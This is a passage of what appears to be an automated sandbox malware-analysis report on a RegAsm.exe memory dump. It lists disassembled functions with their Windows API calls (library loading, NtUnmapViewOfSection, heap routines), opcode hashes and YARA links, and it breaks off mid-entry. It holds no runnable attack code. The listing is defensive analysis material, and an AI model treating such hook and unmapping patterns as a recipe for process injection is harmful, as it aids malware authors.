                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATCatalogInfoFromContext$wintrust.dll
                                                                            • API String ID: 145871493-3354427110
                                                                            • Opcode ID: 2c10eea644964ad41764629312dd97f716fffab30680da5ba03cbe5ad45da9c0
                                                                            • Instruction ID: 1e164a6c63df0a79473e0ed516c8980176ddbd5d85c38187c7d0427882f9e1a7
                                                                            • Opcode Fuzzy Hash: 2c10eea644964ad41764629312dd97f716fffab30680da5ba03cbe5ad45da9c0
                                                                            • Instruction Fuzzy Hash: 8CE04FBC6813419FEF105FE5D969B013BF8F707345F100056E986C1790E7B28040CB28
                                                                            Function 6CC70120 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC47297), ref: 6CC70128
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminEnumCatalogFromHash), ref: 6CC70147
                                                                            • FreeLibrary.KERNEL32(?,6CC47297), ref: 6CC7015E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminEnumCatalogFromHash$wintrust.dll
                                                                            • API String ID: 145871493-1536241729
                                                                            • Opcode ID: 3bb22ac3be42e3246bda19ba6a3b5ea62f9b55676c3b2f5ec7ab2f0b129004e3
                                                                            • Instruction ID: acfabc2c0379f4a697979956ffc150894891bb0f9f11a9cfd44413091fb449c6
                                                                            • Opcode Fuzzy Hash: 3bb22ac3be42e3246bda19ba6a3b5ea62f9b55676c3b2f5ec7ab2f0b129004e3
                                                                            • Instruction Fuzzy Hash: 0FE0927C6453859FEF106FEAD8587167AF8F707345F104015AA06D6B60EBB3C400CB69
                                                                            Function 6CC9C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9C0E9), ref: 6CC9C418
                                                                            • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CC9C437
                                                                            • FreeLibrary.KERNEL32(?,6CC9C0E9), ref: 6CC9C44C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                            • API String ID: 145871493-2623246514
                                                                            • Opcode ID: ecf190e8655b9f2272bc3c3554aae5bea1a44b9d5c7d13f755fb78c8d2b28e7e
                                                                            • Instruction ID: 3891445e8c9b70eaa66cb6624ab46c56df29eb743415b65ae7d71ea7b268d550
                                                                            • Opcode Fuzzy Hash: ecf190e8655b9f2272bc3c3554aae5bea1a44b9d5c7d13f755fb78c8d2b28e7e
                                                                            • Instruction Fuzzy Hash: AAE0927C6053419FDB006FF5C9587127AF8A717304F004116AA0991B60EBB2C4018B58
                                                                            Function 6CC975B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC9748B,?), ref: 6CC975B8
                                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CC975D7
                                                                            • FreeLibrary.KERNEL32(?,6CC9748B,?), ref: 6CC975EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                            • API String ID: 145871493-3641475894
                                                                            • Opcode ID: d3d649e1be201a315bd4cbde7794e23b7e6f9418d119ee6a395d70f57391d10e
                                                                            • Instruction ID: 348c6c644ae85138cc4783dc4b3a9e6899b23022aa0d8daaea1c2cbca9274b5b
                                                                            • Opcode Fuzzy Hash: d3d649e1be201a315bd4cbde7794e23b7e6f9418d119ee6a395d70f57391d10e
                                                                            • Instruction Fuzzy Hash: 78E0B6BD605342AFEF006FE2C8987037AF8EB06218F1040A5B905F1750EBF08492CF18
                                                                            Function 6CC97600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(ntdll.dll,?,6CC97592), ref: 6CC97608
                                                                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CC97627
                                                                            • FreeLibrary.KERNEL32(?,6CC97592), ref: 6CC9763C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                            • API String ID: 145871493-1050664331
                                                                            • Opcode ID: 2c89db1f35db4f091a63ad2647cb40e3740ec44f9e49b4c19eedbc4ab9510053
                                                                            • Instruction ID: f09001c65f94cf9f0539091b7df4eacd722370439b093256ad51bde58d0dcde6
                                                                            • Opcode Fuzzy Hash: 2c89db1f35db4f091a63ad2647cb40e3740ec44f9e49b4c19eedbc4ab9510053
                                                                            • Instruction Fuzzy Hash: 8AE092BC605381AFDF006FEA889C7027AB8EB1B259F004195E905E1750EBB084118B1C
                                                                            Function 6CC9C1F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC9C1DE,?,00000000,?,00000000,?,6CC4779F), ref: 6CC9C1F8
                                                                            • GetProcAddress.KERNEL32(00000000,WinVerifyTrust), ref: 6CC9C217
                                                                            • FreeLibrary.KERNEL32(?,6CC9C1DE,?,00000000,?,00000000,?,6CC4779F), ref: 6CC9C22C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: WinVerifyTrust$wintrust.dll
                                                                            • API String ID: 145871493-2991032369
                                                                            • Opcode ID: 944add89c3aaa2ed1a81b62d78922f782d7e43046e41ef106c66fc6fab4a38d9
                                                                            • Instruction ID: c0d634407497902ba80a9551aff08cc22458bd3bf3b3ebcada0a83bbaaa9899e
                                                                            • Opcode Fuzzy Hash: 944add89c3aaa2ed1a81b62d78922f782d7e43046e41ef106c66fc6fab4a38d9
                                                                            • Instruction Fuzzy Hash: C6E0B67C2053959FDF007FE5C958B027FF8AB07304F000519A905D1B51E7B284008B69
                                                                            Function 6CC9C290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC477C5), ref: 6CC9C298
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6CC9C2B7
                                                                            • FreeLibrary.KERNEL32(?,6CC477C5), ref: 6CC9C2CC
                                                                            Strings
                                                                            • wintrust.dll, xrefs: 6CC9C293
                                                                            • CryptCATAdminCalcHashFromFileHandle, xrefs: 6CC9C2B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                            • API String ID: 145871493-1423897460
                                                                            • Opcode ID: 9ac4e1da2295e261816f421e4870174151b3b63ea2475a35e2c15ca6c8059384
                                                                            • Instruction ID: 22693c313599fa5b7bba1ec44057a73efbe3959b4ee393bb913a7c016af343bc
                                                                            • Opcode Fuzzy Hash: 9ac4e1da2295e261816f421e4870174151b3b63ea2475a35e2c15ca6c8059384
                                                                            • Instruction Fuzzy Hash: 01E0927C2453019FDF006FE9C9587027BF8EB07304F440015A90991B60E7B28400CA59
                                                                            Function 6CC9BAB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(kernelbase.dll,?,6CC405BC), ref: 6CC9BAB8
                                                                            • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6CC9BAD7
                                                                            • FreeLibrary.KERNEL32(?,6CC405BC), ref: 6CC9BAEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: VirtualAlloc2$kernelbase.dll
                                                                            • API String ID: 145871493-1188699709
                                                                            • Opcode ID: 4d57459089094487dbcfaa10be7217c7e17b2296683dfc165a334f37864261c7
                                                                            • Instruction ID: f22b3bd1483651223e18f82dd4b4653c010d7634243b07a83f93fe8e15e54be5
                                                                            • Opcode Fuzzy Hash: 4d57459089094487dbcfaa10be7217c7e17b2296683dfc165a334f37864261c7
                                                                            • Instruction Fuzzy Hash: 6DE0B67C6053C2AFDF129FE6D969706BBF8A707208F14001AB90991750FBBA88548B28
                                                                            Function 6CC9C240 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC477F6), ref: 6CC9C248
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6CC9C267
                                                                            • FreeLibrary.KERNEL32(?,6CC477F6), ref: 6CC9C27C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                                            • API String ID: 145871493-3357690181
                                                                            • Opcode ID: 1fe2f5d1e798f6d9aace20f3d2a2c1d74146fba07a055ac1e6816ee3caee978c
                                                                            • Instruction ID: 9750f24c8266d4207b7a4b2c297eaa1fa43cedef32095a277488dbbd6eb4e7d1
                                                                            • Opcode Fuzzy Hash: 1fe2f5d1e798f6d9aace20f3d2a2c1d74146fba07a055ac1e6816ee3caee978c
                                                                            • Instruction Fuzzy Hash: D6E0B67C2043099FDF046FE2D898B027FF8E70B30AF104055E905D2750E7B284409F59
                                                                            Function 6CC9BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,00000000,?,?,6CC9BE49), ref: 6CC9BEC4
                                                                            • RtlCaptureStackBackTrace.NTDLL ref: 6CC9BEDE
                                                                            • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CC9BE49), ref: 6CC9BF38
                                                                            • RtlReAllocateHeap.NTDLL ref: 6CC9BF83
                                                                            • RtlFreeHeap.NTDLL(6CC9BE49,00000000), ref: 6CC9BFA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                            • String ID:
                                                                            • API String ID: 2764315370-0
                                                                            • Opcode ID: 13c1726869c39de2c7cb3a8f289b194f4574953783f52e91698aeb832841d98a
                                                                            • Instruction ID: 8a86a363faa782c4c098ccf222a2f50d9a735a636dd1f8795293fe31ed1f7d9e
                                                                            • Opcode Fuzzy Hash: 13c1726869c39de2c7cb3a8f289b194f4574953783f52e91698aeb832841d98a
                                                                            • Instruction Fuzzy Hash: 9F519376B002159FE724CF69CD90B9AB3A6FF84314F294639D51AA7B54E730F9068B80
                                                                            Function 6CC88E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88E6E
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88EBF
                                                                            • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F24
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88F46
                                                                            • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F7A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: d42b4b7b850b26f8ca7545d2284dc1bb8744d043945684070f58be811e1cb552
                                                                            • Instruction ID: 3996c22df2696e7c95a5e473bbe47d7e6a0046f0772a66803eab0eb555d8813e
                                                                            • Opcode Fuzzy Hash: d42b4b7b850b26f8ca7545d2284dc1bb8744d043945684070f58be811e1cb552
                                                                            • Instruction Fuzzy Hash: 855191B5A022168FEB14CF58D880A6F7BB2BF4431CF55052AD516ABB40F731F905CBA1
                                                                            Function 6CC460E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC460F4
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46180
                                                                            • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46211
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46229
                                                                            • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4625E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46271
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: f8ba86d1d1e1de648e24742d604f486eb4abb4ee1e17eb6949d66aff11713945
                                                                            • Instruction ID: 0f7d0d423d1ad9f97f33597df31427babf499a056e1dcd41c4756e7a842764cb
                                                                            • Opcode Fuzzy Hash: f8ba86d1d1e1de648e24742d604f486eb4abb4ee1e17eb6949d66aff11713945
                                                                            • Instruction Fuzzy Hash: A151BBB1A00A069FEB14CFA8D8807AEB7B5FF49308F208539D616D7715F731AA19CB51
                                                                            Function 6CC827E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8284D
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8289A
                                                                            • free.MOZGLUE(?,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC828F1
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC82910
                                                                            • free.MOZGLUE(00000001,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8293C
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8294E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: d51013bc4175baa451af49b4aa102f09a6bd09a68578f220f25933a2646bc7a9
                                                                            • Instruction ID: 41aeed2eae40dc61875893e2712f1ec6518153438c2b34b42fc713fc613a7413
                                                                            • Opcode Fuzzy Hash: d51013bc4175baa451af49b4aa102f09a6bd09a68578f220f25933a2646bc7a9
                                                                            • Instruction Fuzzy Hash: A141AFB1A012068FEB14CF68D89876B7BF6EB45308F250939D956EB740F731E905CB61
                                                                            Function 6CC3CFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6CC3D06C
                                                                            • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6CC3D139
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                            • String ID: MOZ_CRASH()
                                                                            • API String ID: 1090480015-2608361144
                                                                            • Opcode ID: 13b19b7ea74258da696513d70c52981f426b789ea78fd624b888345ac9e239f2
                                                                            • Instruction ID: 1d1fe39b57e9816c8628aa655bad432dc5f080289bf79c42a6fb95dad84e9059
                                                                            • Opcode Fuzzy Hash: 13b19b7ea74258da696513d70c52981f426b789ea78fd624b888345ac9e239f2
                                                                            • Instruction Fuzzy Hash: 1941BE72B113264FDB048EBD9D943AA76B0EB49B14F24013DEA19F7784E7B59C018BC8
                                                                            Function 6CC34DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC34EE9
                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC34F02
                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC34F1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                            • String ID:
                                                                            • API String ID: 713647276-0
                                                                            • Opcode ID: 211b947d8446e0edfccbaff786d33c418f2b2d5a631f6567252523424394b90c
                                                                            • Instruction ID: e4f3eb7713e0872eb3c081d0f68176fdd85a4310c73e7e28641e02e56747ae65
